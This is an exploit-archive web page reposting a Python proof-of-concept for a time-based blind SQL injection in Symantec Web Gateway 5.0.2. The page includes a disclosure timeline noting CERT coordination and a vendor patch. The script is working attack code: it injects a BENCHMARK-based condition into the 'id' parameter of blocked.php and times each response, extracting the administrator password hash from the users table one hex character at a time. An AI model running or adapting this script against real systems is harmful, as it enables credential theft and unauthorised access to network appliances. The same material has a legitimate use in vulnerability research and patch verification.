首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
来源:vfocus.net 作者:muts 发布时间:2012-07-24  

#!/usr/bin/python

######################################################################################
# Exploit Title: Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection
# Date: Jul 23 2012
# Author: muts
# Version: Symantec Web Gateway 5.0.2
# Vendor URL: http://www.symantec.com
#
# Timeline:
#
# 29 May 2012: Vulnerability reported to CERT
# 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
# 26 Jun 2012: Email received from Symantec for additional information
# 26 Jun 2012: Additional proofs of concept sent to Symantec
# 06 Jul 2012: Update received from Symantec with intent to fix
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00
# 23 Jul 2012: Public Disclosure
#
######################################################################################

import urllib
import time
import sys
from time import sleep

# Set your timing variable. A minimum value of 200 (2 seconds) was tested on localhost.
# This might need to be higher on production systems.

timing=300

def check_char(i,j,timing):

 url =  ("https://172.16.254.111/spywall/blocked.php?d=3&file=3&id=1)" +
  " or 1=(select IF(conv(mid((select password from users),%s,1),16,10) "+
  "= %s,BENCHMARK(%s,rand()),11) LIMIT 1&history=-2&u=3") % (j,i,timing)
 start=time.time()
 urllib.urlopen(url)
 end =time.time()
 howlong=int(end-start)
 return howlong

counter=0
startexploit=time.time()
print "[*] Symantec \"Wall of Spies\" hash extractor"
print "[*] Time Based SQL injection, please wait..."
sys.stdout.write("[*] Admin hash is : ")
sys.stdout.flush()

for m in range(1,33):
 for n in range(0,16):
  counter= counter+1
  output = check_char(n,m,timing)
  if output > ((timing/100)-1):
   byte =hex(n)[2:]
   sys.stdout.write(byte)
   sys.stdout.flush()
   break
endexploit=time.time()
totalrun=str(endexploit-startexploit)
print "\n[*] Total of %s queries in %s seconds" % (counter,totalrun)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Photodex ProShow Producer v5.0
·MyMp3 Player Stack .m3u DEP By
·EGallery PHP File Upload Vulne
·AlienVault OSSIM 3.1 Reflected
·Simple Web Server Connection H
·Symantec Web Gateway 5.0.3.18
·Ipswitch WhatsUp Gold 15.02 St
·Dell SonicWALL Scrutinizer 9.0
·Zabbix 2.0.1 and Earlier Sessi
·SolarWinds Orion Network Perfo
·Symantec Web Gateway 5.0.3.18
·Atmail Email Server Appliance
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved